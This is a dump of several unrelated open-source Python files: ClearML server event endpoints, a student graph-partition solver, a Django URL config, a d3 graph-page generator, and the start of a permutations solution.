company_id=index_company, event_type=EventType.all, task_id=task_id, iters=1\n ).get(task_id)\n call.result.data = dict(\n metrics=metrics,\n last_iter=last_iters[0] if last_iters else 0,\n name=task.name,\n status=task.status,\n last_timestamp=last_timestamp,\n )\n\n\n# todo: should not repeat iter (x-axis) for each metric/variant, JS client should get raw data and fill gaps if needed\n@endpoint(\n \"events.scalar_metrics_iter_histogram\",\n request_data_model=ScalarMetricsIterHistogramRequest,\n)\ndef scalar_metrics_iter_histogram(\n call, company_id, request: ScalarMetricsIterHistogramRequest\n):\n task_or_model = _assert_task_or_model_exists(\n company_id, request.task, model_events=request.model_events\n )[0]\n metrics = event_bll.metrics.get_scalar_metrics_average_per_iter(\n company_id=task_or_model.get_index_company(),\n task_id=request.task,\n samples=request.samples,\n key=request.key,\n metric_variants=_get_metric_variants_from_request(request.metrics),\n )\n call.result.data = metrics\n\n\ndef _get_task_or_model_index_companies(\n company_id: str,\n task_ids: Sequence[str],\n model_events=False,\n) -> TaskCompanies:\n \"\"\"\n Returns lists of tasks grouped by company\n \"\"\"\n tasks_or_models = _assert_task_or_model_exists(\n company_id,\n task_ids,\n model_events=model_events,\n )\n\n unique_ids = set(task_ids)\n if len(tasks_or_models) < len(unique_ids):\n invalid = tuple(unique_ids - {t.id for t in tasks_or_models})\n error_cls = (\n errors.bad_request.InvalidModelId\n if model_events\n else errors.bad_request.InvalidTaskId\n )\n raise error_cls(company=company_id, ids=invalid)\n\n return bucketize(tasks_or_models, key=lambda t: t.get_index_company())\n\n\n@endpoint(\n \"events.multi_task_scalar_metrics_iter_histogram\",\n request_data_model=MultiTaskScalarMetricsIterHistogramRequest,\n)\ndef multi_task_scalar_metrics_iter_histogram(\n call, company_id, request: MultiTaskScalarMetricsIterHistogramRequest\n):\n task_ids = request.tasks\n if isinstance(task_ids, str):\n task_ids = [s.strip() for s in task_ids.split(\",\")]\n\n call.result.data = dict(\n metrics=event_bll.metrics.compare_scalar_metrics_average_per_iter(\n companies=_get_task_or_model_index_companies(\n company_id, task_ids, request.model_events\n ),\n samples=request.samples,\n key=request.key,\n )\n )\n\n\ndef _get_single_value_metrics_response(\n companies: TaskCompanies, value_metrics: Mapping[str, dict]\n) -> Sequence[dict]:\n task_names = {\n task.id: task.name for task in itertools.chain.from_iterable(companies.values())\n }\n return [\n {\"task\": task_id, \"task_name\": task_names.get(task_id), \"values\": values}\n for task_id, values in value_metrics.items()\n ]\n\n\n@endpoint(\"events.get_task_single_value_metrics\")\ndef get_task_single_value_metrics(\n call, company_id: str, request: SingleValueMetricsRequest\n):\n companies = _get_task_or_model_index_companies(\n company_id, request.tasks, request.model_events\n )\n call.result.data = dict(\n tasks=_get_single_value_metrics_response(\n companies=companies,\n value_metrics=event_bll.metrics.get_task_single_value_metrics(\n companies=companies\n ),\n )\n )\n\n\n@endpoint(\"events.get_multi_task_plots\", required_fields=[\"tasks\"])\ndef get_multi_task_plots_v1_7(call, company_id, _):\n task_ids = call.data[\"tasks\"]\n iters = call.data.get(\"iters\", 1)\n scroll_id = call.data.get(\"scroll_id\")\n\n companies = _get_task_or_model_index_companies(company_id, task_ids)\n\n # Get last 10K events by iteration and group them by unique metric+variant, returning top events for combination\n result = event_bll.get_task_events(\n list(companies),\n task_ids,\n event_type=EventType.metrics_plot,\n sort=[{\"iter\": {\"order\": \"desc\"}}],\n size=10000,\n scroll_id=scroll_id,\n )\n\n task_names = {\n t.id: t.name for t in itertools.chain.from_iterable(companies.values())\n }\n return_events = _get_top_iter_unique_events_per_task(\n result.events, max_iters=iters, task_names=task_names\n )\n\n call.result.data = dict(\n plots=return_events,\n returned=len(return_events),\n total=result.total_events,\n scroll_id=result.next_scroll_id,\n )\n\n\ndef _get_multitask_plots(\n companies: TaskCompanies,\n last_iters: int,\n last_iters_per_task_metric: bool,\n metrics: MetricVariants = None,\n scroll_id=None,\n no_scroll=True,\n) -> Tuple[dict, int, str]:\n task_names = {\n t.id: t.name for t in itertools.chain.from_iterable(companies.values())\n }\n result = event_bll.get_task_events(\n company_id=list(companies),\n task_id=list(task_names),\n event_type=EventType.metrics_plot,\n metrics=metrics,\n last_iter_count=last_iters,\n sort=[{\"iter\": {\"order\": \"desc\"}}],\n scroll_id=scroll_id,\n no_scroll=no_scroll,\n size=config.get(\n \"services.events.events_retrieval.multi_plots_batch_size\", 1000\n ),\n last_iters_per_task_metric=last_iters_per_task_metric,\n )\n return_events = _get_top_iter_unique_events_per_task(\n result.events, max_iters=last_iters, task_names=task_names\n )\n return return_events, result.total_events, result.next_scroll_id\n\n\n@endpoint(\"events.get_multi_task_plots\", min_version=\"1.8\")\ndef get_multi_task_plots(call, company_id, request: MultiTaskPlotsRequest):\n companies = _get_task_or_model_index_companies(\n company_id, request.tasks, model_events=request.model_events\n )\n return_events, total_events, next_scroll_id = _get_multitask_plots(\n companies=companies,\n last_iters=request.iters,\n scroll_id=request.scroll_id,\n no_scroll=request.no_scroll,\n last_iters_per_task_metric=request.last_iters_per_task_metric,\n )\n call.result.data = dict(\n plots=return_events,\n returned=len(return_events),\n total=total_events,\n scroll_id=next_scroll_id,\n )\n\n\n@endpoint(\"events.get_task_plots\", required_fields=[\"task\"])\ndef get_task_plots_v1_7(call, company_id, _):\n task_id = call.data[\"task\"]\n iters = call.data.get(\"iters\", 1)\n scroll_id = call.data.get(\"scroll_id\")\n\n task = task_bll.assert_exists(\n company_id, task_id, allow_public=True, only=(\"company\", \"company_origin\")\n )[0]\n # events, next_scroll_id, total_events = event_bll.get_task_events(\n # company, task_id,\n # event_type=\"plot\",\n # sort=[{\"iter\": {\"order\": \"desc\"}}],\n # last_iter_count=iters,\n # scroll_id=scroll_id)\n\n # get last 10K events by iteration and group them by unique metric+variant, returning top events for combination\n result = event_bll.get_task_events(\n task.get_index_company(),\n task_id,\n event_type=EventType.metrics_plot,\n sort=[{\"iter\": {\"order\": \"desc\"}}],\n size=10000,\n scroll_id=scroll_id,\n )\n\n return_events = _get_top_iter_unique_events(result.events, max_iters=iters)\n\n call.result.data = dict(\n plots=return_events,\n returned=len(return_events),\n total=result.total_events,\n scroll_id=result.next_scroll_id,\n )\n\n\ndef _get_metric_variants_from_request(\n req_metrics: Sequence[ApiMetrics],\n) -> Optional[MetricVariants]:\n if not req_metrics:\n return None\n\n return {m.metric: m.variants for m in req_metrics}\n\n\n@endpoint(\n \"events.get_task_plots\", min_version=\"1.8\", request_data_model=TaskPlotsRequest\n)\ndef get_task_plots(call, company_id, request: TaskPlotsRequest):\n task_id = request.task\n iters = request.iters\n\n task_or_model = _assert_task_or_model_exists(\n company_id, task_id, model_events=request.model_events\n )[0]\n result = event_bll.get_task_plots(\n task_or_model.get_index_company(),\n task_id=task_id,\n last_iterations_per_plot=iters,\n metric_variants=_get_metric_variants_from_request(request.metrics),\n )\n\n return_events = result.events\n\n call.result.data = dict(\n plots=return_events,\n returned=len(return_events),\n total=result.total_events,\n scroll_id=result.next_scroll_id,\n )\n\n\ndef _task_metrics_dict_from_request(req_metrics: Sequence[TaskMetric]) -> dict:\n task_metrics = defaultdict(dict)\n for tm in req_metrics:\n task_metrics[tm.task][tm.metric] = tm.variants\n for metrics in task_metrics.values():\n if None in metrics:\n metrics.clear()\n\n return task_metrics\n\n\ndef _get_metrics_response(metric_events: Sequence[tuple]) -> Sequence[MetricEvents]:\n return [\n MetricEvents(\n task=task,\n iterations=[\n IterationEvents(iter=iteration[\"iter\"], events=iteration[\"events\"])\n for iteration in iterations\n ],\n )\n for (task, iterations) in metric_events\n ]\n\n\n@endpoint(\n \"events.plots\",\n request_data_model=MetricEventsRequest,\n response_data_model=MetricEventsResponse,\n)\ndef task_plots(call, company_id, request: MetricEventsRequest):\n task_metrics = _task_metrics_dict_from_request(request.metrics)\n task_ids = list(task_metrics)\n task_or_models = _assert_task_or_model_exists(\n company_id, task_ids=task_ids, model_events=request.model_events\n )\n result = event_bll.plots_iterator.get_task_events(\n companies={t.id: t.get_index_company() for t in task_or_models},\n task_metrics=task_metrics,\n iter_count=request.iters,\n navigate_earlier=request.navigate_earlier,\n refresh=request.refresh,\n state_id=request.scroll_id,\n )\n\n call.result.data_model = MetricEventsResponse(\n scroll_id=result.next_scroll_id,\n metrics=_get_metrics_response(result.metric_events),\n )\n\n\n@endpoint(\"events.debug_images\", required_fields=[\"task\"])\ndef get_debug_images_v1_7(call, company_id, _):\n task_id = call.data[\"task\"]\n iters = call.data.get(\"iters\") or 1\n scroll_id = call.data.get(\"scroll_id\")\n\n task = task_bll.assert_exists(\n company_id, task_id, allow_public=True, only=(\"company\", \"company_origin\")\n )[0]\n # events, next_scroll_id, total_events = event_bll.get_task_events(\n # company, task_id,\n # event_type=\"training_debug_image\",\n # sort=[{\"iter\": {\"order\": \"desc\"}}],\n # last_iter_count=iters,\n # scroll_id=scroll_id)\n\n # get last 10K events by iteration and group them by unique metric+variant, returning top events for combination\n result = event_bll.get_task_events(\n task.get_index_company(),\n task_id,\n event_type=EventType.metrics_image,\n sort=[{\"iter\": {\"order\": \"desc\"}}],\n size=10000,\n scroll_id=scroll_id,\n )\n\n return_events = _get_top_iter_unique_events(result.events, max_iters=iters)\n\n call.result.data = dict(\n task=task_id,\n images=return_events,\n returned=len(return_events),\n total=result.total_events,\n scroll_id=result.next_scroll_id,\n )\n\n\n@endpoint(\"events.debug_images\", min_version=\"1.8\", required_fields=[\"task\"])\ndef get_debug_images_v1_8(call, company_id, _):\n task_id = call.data[\"task\"]\n iters = call.data.get(\"iters\") or 1\n scroll_id = call.data.get(\"scroll_id\")\n model_events = call.data.get(\"model_events\", False)\n\n tasks_or_model = _assert_task_or_model_exists(\n company_id,\n task_id,\n model_events=model_events,\n )[0]\n result = event_bll.get_task_events(\n tasks_or_model.get_index_company(),\n task_id,\n event_type=EventType.metrics_image,\n sort=[{\"iter\": {\"order\": \"desc\"}}],\n last_iter_count=iters,\n scroll_id=scroll_id,\n )\n\n return_events = result.events\n\n call.result.data = dict(\n task=task_id,\n images=return_events,\n returned=len(return_events),\n total=result.total_events,\n scroll_id=result.next_scroll_id,\n )\n\n\n@endpoint(\n \"events.debug_images\",\n min_version=\"2.7\",\n request_data_model=MetricEventsRequest,\n response_data_model=MetricEventsResponse,\n)\ndef get_debug_images(call, company_id, request: MetricEventsRequest):\n task_metrics = _task_metrics_dict_from_request(request.metrics)\n task_ids = list(task_metrics)\n task_or_models = _assert_task_or_model_exists(\n company_id, task_ids=task_ids, model_events=request.model_events\n )\n result = event_bll.debug_images_iterator.get_task_events(\n companies={t.id: t.get_index_company() for t in task_or_models},\n task_metrics=task_metrics,\n iter_count=request.iters,\n navigate_earlier=request.navigate_earlier,\n refresh=request.refresh,\n state_id=request.scroll_id,\n )\n\n call.result.data_model = MetricEventsResponse(\n scroll_id=result.next_scroll_id,\n metrics=_get_metrics_response(result.metric_events),\n )\n\n\n@endpoint(\n \"events.get_debug_image_sample\",\n min_version=\"2.12\",\n request_data_model=GetVariantSampleRequest,\n)\ndef get_debug_image_sample(call, company_id, request: GetVariantSampleRequest):\n task_or_model = _assert_task_or_model_exists(\n company_id,\n request.task,\n model_events=request.model_events,\n )[0]\n res = event_bll.debug_image_sample_history.get_sample_for_variant(\n company_id=task_or_model.get_index_company(),\n task=request.task,\n metric=request.metric,\n variant=request.variant,\n iteration=request.iteration,\n refresh=request.refresh,\n state_id=request.scroll_id,\n navigate_current_metric=request.navigate_current_metric,\n )\n call.result.data = attr.asdict(res, recurse=False)\n\n\n@endpoint(\n \"events.next_debug_image_sample\",\n min_version=\"2.12\",\n request_data_model=NextHistorySampleRequest,\n)\ndef next_debug_image_sample(call, company_id, request: NextHistorySampleRequest):\n task_or_model = _assert_task_or_model_exists(\n company_id,\n request.task,\n model_events=request.model_events,\n )[0]\n res = event_bll.debug_image_sample_history.get_next_sample(\n company_id=task_or_model.get_index_company(),\n task=request.task,\n state_id=request.scroll_id,\n navigate_earlier=request.navigate_earlier,\n next_iteration=request.next_iteration,\n )\n call.result.data = attr.asdict(res, recurse=False)\n\n\n@endpoint(\n \"events.get_plot_sample\",\n request_data_model=GetMetricSamplesRequest,\n)\ndef get_plot_sample(call, company_id, request: GetMetricSamplesRequest):\n task_or_model = _assert_task_or_model_exists(\n company_id,\n request.task,\n model_events=request.model_events,\n )[0]\n res = event_bll.plot_sample_history.get_samples_for_metric(\n company_id=task_or_model.get_index_company(),\n task=request.task,\n metric=request.metric,\n iteration=request.iteration,\n refresh=request.refresh,\n state_id=request.scroll_id,\n navigate_current_metric=request.navigate_current_metric,\n )\n call.result.data = attr.asdict(res, recurse=False)\n\n\n@endpoint(\n \"events.next_plot_sample\",\n request_data_model=NextHistorySampleRequest,\n)\ndef next_plot_sample(call, company_id, request: NextHistorySampleRequest):\n task_or_model = _assert_task_or_model_exists(\n company_id,\n request.task,\n model_events=request.model_events,\n )[0]\n res = event_bll.plot_sample_history.get_next_sample(\n company_id=task_or_model.get_index_company(),\n task=request.task,\n state_id=request.scroll_id,\n navigate_earlier=request.navigate_earlier,\n next_iteration=request.next_iteration,\n )\n call.result.data = attr.asdict(res, recurse=False)\n\n\n@endpoint(\"events.get_task_metrics\", request_data_model=TaskMetricsRequest)\ndef get_task_metrics(call: APICall, company_id, request: TaskMetricsRequest):\n task_or_models = _assert_task_or_model_exists(\n company_id,\n request.tasks,\n model_events=request.model_events,\n )\n res = event_bll.metrics.get_task_metrics(\n task_or_models[0].get_index_company(),\n task_ids=request.tasks,\n event_type=request.event_type,\n )\n call.result.data = {\n \"metrics\": [{\"task\": task, \"metrics\": metrics} for (task, metrics) in res]\n }\n\n\n@endpoint(\"events.delete_for_task\", required_fields=[\"task\"])\ndef delete_for_task(call, company_id, _):\n task_id = call.data[\"task\"]\n allow_locked = call.data.get(\"allow_locked\", False)\n\n task_bll.assert_exists(company_id, task_id, return_tasks=False)\n call.result.data = dict(\n deleted=event_bll.delete_task_events(\n company_id, task_id, allow_locked=allow_locked\n )\n )\n\n\n@endpoint(\"events.delete_for_model\", required_fields=[\"model\"])\ndef delete_for_model(call: APICall, company_id: str, _):\n model_id = call.data[\"model\"]\n allow_locked = call.data.get(\"allow_locked\", False)\n\n model_bll.assert_exists(company_id, model_id, return_models=False)\n call.result.data = dict(\n deleted=event_bll.delete_task_events(\n company_id, model_id, allow_locked=allow_locked, model=True\n )\n )\n\n\n@endpoint(\"events.clear_task_log\")\ndef clear_task_log(call: APICall, company_id: str, request: ClearTaskLogRequest):\n task_id = request.task\n\n task_bll.assert_exists(company_id, task_id, return_tasks=False)\n call.result.data = dict(\n deleted=event_bll.clear_task_log(\n company_id=company_id,\n task_id=task_id,\n allow_locked=request.allow_locked,\n threshold_sec=request.threshold_sec,\n )\n )\n\n\ndef _get_top_iter_unique_events_per_task(\n events, max_iters: int, task_names: Mapping[str, str]\n):\n key_fields = (\"metric\", \"variant\", \"task\")\n unique_events = itertools.chain.from_iterable(\n itertools.islice(group, max_iters)\n for _, group in itertools.groupby(\n sorted(events, key=itemgetter(*(key_fields + (\"iter\",))), reverse=True),\n key=itemgetter(*key_fields),\n )\n )\n\n def collect(evs, fields):\n if not fields:\n evs = list(evs)\n return {\"name\": task_names.get(evs[0].get(\"task\")), \"plots\": evs}\n return {\n str(k): collect(group, fields[1:])\n for k, group in itertools.groupby(evs, key=itemgetter(fields[0]))\n }\n\n collect_fields = (\"metric\", \"variant\", \"task\", \"iter\")\n return collect(\n sorted(unique_events, key=itemgetter(*collect_fields), reverse=True),\n collect_fields,\n )\n\n\ndef _get_top_iter_unique_events(events, max_iters):\n top_unique_events = defaultdict(lambda: [])\n for ev in events:\n key = ev.get(\"metric\", \"\") + ev.get(\"variant\", \"\")\n evs = top_unique_events[key]\n if len(evs) < max_iters:\n evs.append(ev)\n unique_events = list(\n itertools.chain.from_iterable(list(top_unique_events.values()))\n )\n unique_events.sort(key=lambda e: e[\"iter\"], reverse=True)\n return unique_events\n\n\nclass ScalarMetricsIterRawScroll(Scroll):\n from_key_value = jsonmodels.fields.StringField()\n total = jsonmodels.fields.IntField()\n request: ScalarMetricsIterRawRequest = jsonmodels.fields.EmbeddedField(\n ScalarMetricsIterRawRequest\n )\n\n\n@endpoint(\"events.scalar_metrics_iter_raw\", min_version=\"2.16\")\ndef scalar_metrics_iter_raw(\n call: APICall, company_id: str, request: ScalarMetricsIterRawRequest\n):\n key = request.key or ScalarKeyEnum.iter\n scalar_key = ScalarKey.resolve(key)\n if request.batch_size and request.batch_size < 0:\n raise errors.bad_request.ValidationError(\n \"batch_size should be non negative number\"\n )\n\n if not request.scroll_id:\n from_key_value = None\n total = None\n request.batch_size = request.batch_size or 10_000\n else:\n try:\n scroll = ScalarMetricsIterRawScroll.from_scroll_id(request.scroll_id)\n except ValueError:\n raise errors.bad_request.InvalidScrollId(scroll_id=request.scroll_id)\n\n if scroll.from_key_value is None:\n return make_response(\n scroll_id=request.scroll_id, total=scroll.total, variants={}\n )\n\n from_key_value = scalar_key.cast_value(scroll.from_key_value)\n total = scroll.total\n request.batch_size = request.batch_size or scroll.request.batch_size\n\n task_id = request.task\n task_or_model = _assert_task_or_model_exists(\n company_id, task_id, model_events=request.model_events\n )[0]\n metric_variants = _get_metric_variants_from_request([request.metric])\n\n if request.count_total and total is None:\n total = event_bll.events_iterator.count_task_events(\n event_type=EventType.metrics_scalar,\n company_id=task_or_model.get_index_company(),\n task_id=task_id,\n metric_variants=metric_variants,\n )\n\n batch_size = min(\n request.batch_size,\n int(\n config.get(\"services.events.events_retrieval.max_raw_scalars_size\", 200_000)\n ),\n )\n\n events = []\n for iteration in range(0, math.ceil(batch_size / 10_000)):\n res = event_bll.events_iterator.get_task_events(\n event_type=EventType.metrics_scalar,\n company_id=task_or_model.get_index_company(),\n task_id=task_id,\n batch_size=min(batch_size, 10_000),\n navigate_earlier=False,\n from_key_value=from_key_value,\n metric_variants=metric_variants,\n key=key,\n )\n if not res.events:\n break\n events.extend(res.events)\n from_key_value = str(events[-1][scalar_key.field])\n\n key = str(key)\n variants = {\n variant: extract_properties_to_lists(\n [\"value\", scalar_key.field], events, target_keys=[\"y\", key]\n )\n for variant, events in bucketize(events, key=itemgetter(\"variant\")).items()\n }\n\n call.kpis[\"events\"] = len(events)\n\n scroll = ScalarMetricsIterRawScroll(\n from_key_value=str(events[-1][scalar_key.field]) if events else None,\n total=total,\n request=request,\n )\n\n return make_response(\n returned=len(events),\n total=total,\n scroll_id=scroll.get_scroll_id(),\n variants=variants,\n )\n\n\n@endpoint(\"events.clear_scroll\", min_version=\"2.18\")\ndef clear_scroll(_, __, request: ClearScrollRequest):\n if request.scroll_id:\n event_bll.clear_scroll(request.scroll_id)\n","repo_name":"allegroai/clearml-server","sub_path":"apiserver/services/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":37183,"program_lang":"python","lang":"en","doc_type":"code","stars":334,"dataset":"github-code","pt":"21"} +{"seq_id":"39947995952","text":"import networkx as nx\n\nfrom parse import *\nfrom utils import *\nimport glob\nimport sys\n\n\ndef solve(G, s):\n \"\"\"\n Args:\n G: networkx.Graph\n s: stress_budget\n Returns:\n D: Dictionary mapping for student to breakout room r e.g. {0:2, 1:0, 2:1, 3:2}\n k: Number of breakout rooms\n \"\"\"\n\n # TODO: your code here!\n D = {}\n k = 0\n \n students_left = G.number_of_nodes()\n student_pairs = G.edges\n student_pair_to_ratio = {}\n for pair in student_pairs:\n #print(G.edges[pair][\"stress\"], pair)\n ratio = 100000\n if G.edges[pair][\"stress\"] > 0:\n ratio = G.edges[pair][\"happiness\"] / G.edges[pair][\"stress\"]\n student_pair_to_ratio[pair] = [ratio, G.edges[pair][\"happiness\"]]\n student_pair_to_ratio = sorted(student_pair_to_ratio.items(), key = lambda x: (x[1][0], x[1][1]), reverse=True)\n\n room_to_students = {}\n\n while students_left > 0 and k < G.number_of_nodes():\n students_left = G.number_of_nodes()\n k += 1\n D.clear()\n #students_remaining = student_pair_to_ratio.copy()\n #print(\"Number of breakout rooms so far: \" + str(k))\n #print(\"Stress Threshoed: \" + str(s/k))\n for r in range(k):\n #room_stress = 0\n room_to_students[r] = []\n for pair_and_ratio in student_pair_to_ratio:\n pair = pair_and_ratio[0]\n student_1 = pair[0]\n student_2 = pair[1]\n #print(\"First student pair: \" + str(pair_and_ratio))\n # If both students are already in assigned rooms, go to next pair\n if student_1 in D.keys() and student_2 in D.keys():\n #print(\"Both students in this pair are already assigned to rooms.\")\n continue\n temp = room_to_students[r].copy()\n temp.extend(pair)\n #print(\"Students in room \" + str(r) +\": \" + str(room_to_students[r]))\n #print(\"Stress in this room: \" + str(calculate_stress_for_room(room_to_students[r], G)))\n if calculate_stress_for_room(temp, G) <= s/k:\n if student_1 not in D.keys() and student_2 not in D.keys():\n D[student_1] = r\n D[student_2] = r\n room_to_students[r].extend(pair)\n students_left -= 2\n elif student_1 in room_to_students[r] and student_2 not in D.keys():\n D[student_2] = r\n room_to_students[r].append(student_2)\n students_left -= 1\n elif student_1 not in D.keys() and student_2 in room_to_students[r]:\n D[student_1] = r\n room_to_students[r].append(student_1)\n students_left -= 1\n elif r + 1 >= k:\n break\n #print(\"Number of unassigned students: \" + str(students_left))\n\n #print(student_pair_to_ratio[0][0])\n return D, k\n\n\n# Here's an example of how to run your solver.\n\n# Usage: python3 solver.py test.in\n\n\"\"\"\nif __name__ == '__main__':\n assert len(sys.argv) == 2\n path = sys.argv[1]\n G, s = read_input_file(path)\n solve(G, s)\n D, k = solve(G, s)\n assert is_valid_solution(D, G, s, k)\n print(\"Total Happiness: {}\".format(calculate_happiness(D, G)))\n print(\"Number of Breakout Rooms: \" + str(k))\n print(D)\n #write_output_file(D, 'out/test.out')\n\"\"\"\n\n# For testing a folder of inputs to create a folder of outputs, you can use glob (need to import it)\nif __name__ == '__main__':\n inputs = glob.glob('inputs/*')\n for input_path in inputs:\n output_path = 'outputs/' + str(input_path)[7:][:-3] + '.out'\n G, s = read_input_file(input_path)\n D, k = solve(G, s)\n assert is_valid_solution(D, G, s, k)\n happiness = calculate_happiness(D, G) \n write_output_file(D, output_path)\n","repo_name":"TheEthanDing/cs170_project","sub_path":"solver_naive_greedy.py","file_name":"solver_naive_greedy.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14904316525","text":"\"\"\"mysite URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n # ^$ 는 현재 폴더를 의미\n url(r'^$',views.index, name = 'polls'),\n url(r'^signin/',views.signin, name='signin' ),\n url(r'^login/',views.login, name='login' ),\n url(r'^logout/',views.logout, name='logout' ),\n url(r'^register/',views.register, ),\n url(r'^index1/',views.index1, name = 'index1' ),\n url(r'^book/(?P[0-9]+)/$' ,views.bookdetail, name='bookdetail'),\n url(r'^rent/(?P[0-9]+)/$', views.rent, name='rent'),\n url(r'^rentlist/', views.rentlist2, name='rentlist2'),\n # url(r'^dojoin/', views.dojoin, name='dojoin'),\n # \n]\n","repo_name":"chaezz/django-firstweb","sub_path":"polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15980932710","text":"# -*- coding: utf-8 -*-\n# 3.0\n\n# \n\n# Generation 4 graph builder library\n\n# \n\nimport json\nimport pymysql\nimport pandas.io.sql as psql\nimport unittest\n\nfrom settings_statmart import *\nimport utils_statmart as us\nimport gen4_html as html\nimport gen4_d3js_parts as d3\n\nimport imp\nimp.reload(d3)\n\n# \n\ndef build_file_name(config):\n return \"%s_%s.php\" % (config[\"prefix\"], config[\"suffix\"]);\n\n# \n\ndef get_all_series_json(config):\n df = \"\"\n with statmart_utils.get_db_connection() as cursor:\n query = \"\"\"\n SELECT identifier, description\n FROM series as S \n WHERE S.identifier like '%s%s%s'\n \"\"\" % (config(\"prefix\"), \"\\_%\\_\", config(\"suffix\"))\n df = psql.frame_query(query, con=cursor.connection)\n return json.dumps(df.as_matrix().tolist(),indent=4)\n\n# \n\ndef build_d3_head(title, include_path=\"../../inc/\",style_include=\"style_basic.php\"):\n meta = html.meta([(\"http-equiv\", \"content-type\"), (\"content\",\"text/html; charset=UTF-8\")])\n titl = html.title(title)\n scrp = html.script_ext(statmart_d3_path)\n styl = html.style(html.php_include(include_path + style_include))\n head = (\"\\n\").join([meta,titl,scrp,styl])\n return html.head(head)\n\n# \n\ndef build_d3_line_graph(config):\n script = []\n script.append(d3.metadata_iso3_map % (config[\"iso3_map\"])) \n script.append(d3.metadata_series_info_map % (config[\"series_info_map\"])) \n \n if \"currency_year\" in config:\n script.append(util_currency_converter_2005)\n \n if config[\"series_source\"] == \"params\":\n script.append(d3.util_function_get_parameters_by_name)\n if config[\"series_param\"] == \"iso3\":\n script.append(d3.js_series_name_from_iso3_parameter % (config[\"prefix\"],config[\"suffix\"]))\n elif config[\"series_param\"] == \"s\":\n script.append(d3.js_series_name_from_s_parameter)\n \n if config[\"data_source\"] == \"local\":\n script.append(d3.js_dataset_list % get_all_series_json(config))\n elif config[\"data_source\"] == \"query\":\n script.append(d3.js_data_url_series_query)\n \n script.append(d3.graph_set_title % (config[\"title\"])) \n if config[\"subtitle\"] == \"countryname\": \n script.append(d3.graph_set_subtitle_country)\n else:\n script.append(d3.graph_set_subtitle % (config[\"subtitle\"])) \n \n script.append(d3.graph_default_size)\n script.append(d3.graph_title_location)\n script.append(d3.graph_default_header)\n \n script.append(d3.include_js_d3_basic_axis)\n script.append(d3.js_d3_start_csv)\n \n if config[\"unit\"] == \"guess\":\n script.append(d3.js_unit_guess)\n else:\n script.append(d3.js_unit_set % (config[\"unit\"], str(config[\"multiplier\"])))\n \n script.append(d3.js_d3_process_annual_csv_data)\n script.append(d3.js_d3_build_simple_xy_domains)\n script.append(d3.js_d3_svg_build_x_axis)\n \n if config[\"y_axis_label\"] == \"unit\":\n script.append(d3.js_d3_svg_build_y_axis_unit_label)\n else:\n script.append(d3.js_d3_svg_build_y_axis_label % config[\"y_axis_label\"])\n \n script.append(d3.js_d3_svg_draw_line)\n script.append(d3.svg_draw_title)\n script.append(d3.svg_draw_subtitle)\n script.append(d3.svg_draw_source)\n script.append(d3.js_d3_end_csv)\n \n head = build_d3_head(config[\"indicator\"])\n body = html.body(html.script(\"\\n\".join(script)))\n page = html.html(head + \"\\n\" + body)\n page_name = build_file_name(config)\n us.mkdirs(config[\"gen_4_dir\"])\n page_file = open(config[\"gen_4_dir\"] + page_name, \"w\", encoding=\"utf8\")\n page_file.write(page)\n page_file.close() \n return page\n\n# \n\ndef get_iso3_map_json(config):\n df = \"\"\n with us.get_db_connection() as cursor:\n query = \"\"\"\n SELECT L.iso3, L.countryname, O.series, COUNT(O.dateid) as numberyears\n FROM observation as O\n INNER JOIN location as L ON O.locationid = L.id\n WHERE O.series like '%s\\_%s\\_%s'\n GROUP BY L.iso3\n \"\"\" % (config[\"prefix\"], \"%\", config[\"suffix\"])\n df = psql.frame_query(query, con=cursor.connection)\n df = df.set_index(\"iso3\")\n return df.to_json(orient=\"index\")\n\n# \n\ndef get_series_info_map_json(config):\n df = \"\"\n with us.get_db_connection() as cursor:\n query = \"\"\"\n SELECT identifier, originalsource, proximatesource\n FROM series\n WHERE series.identifier like '%s\\_%s\\_%s'\n \"\"\" % (config[\"prefix\"], \"%\", config[\"suffix\"])\n df = psql.frame_query(query, con=cursor.connection)\n df = df.set_index(\"identifier\")\n return df.to_json(orient=\"index\")\n\n# \n\ndef build_gen4_config(config, \n title=\"indicator\", \n subtitle=\"countryname\",\n y_axis_label=\"unit\",\n data_source=\"query\", \n series_source=\"params\", \n series_param=\"iso3\",\n unit=\"guess\"):\n config[\"iso3_map\"] = get_iso3_map_json(config)\n config[\"series_info_map\"] = get_series_info_map_json(config)\n config[\"title\"] = title\n if title == \"indicator\":\n config[\"title\"] = config[\"indicator\"]\n config[\"subtitle\"] = subtitle\n config[\"y_axis_label\"] = y_axis_label\n config[\"data_source\"] = data_source\n config[\"series_source\"] = series_source\n config[\"series_param\"] = series_param\n config[\"unit\"] = unit\n return config\n\n# \n\n\n","repo_name":"spikewilliams/statmart","sub_path":"scripts/gen4_utils.py","file_name":"gen4_utils.py","file_ext":"py","file_size_in_byte":5647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8888745025","text":"'''\r\nCreated on 20160501\r\n\r\n@author: Kenneth Tse\r\n\r\nGiven a collection of distinct numbers, return all possible permutations.\r\n\r\nFor example,\r\n[1,2,3] have the following permutations:\r\n[1,2,3], [1,3,2], [2,1,3], [2,3,1], [3,1,2], and [3,2,1].\r\n\r\n'''\r\n\r\nclass Solution(object):\r\n def permute(self, nums):\r\n \"\"\"\r\n :type nums: List[int]\r\n :rtype: List[List[int]]\r\n \"\"\"\r\n if nums is None or len(nums) == 0: return []\r\n if len(nums) == 1: return [nums]\r\n \r\n lessret = self.permute(nums[1:])\r\n \r\n ret = []\r\n \r\n for comb in lessret:\r\n for i in range(len(nums)):\r\n #ret.append(comb[:].insert(i, nums[0]))\r\n l = comb[:]\r\n l.insert(i, nums[0])\r\n ret.append(l)\r\n\r\n \r\n return ret\r\n \r\n \r\n\r\nif 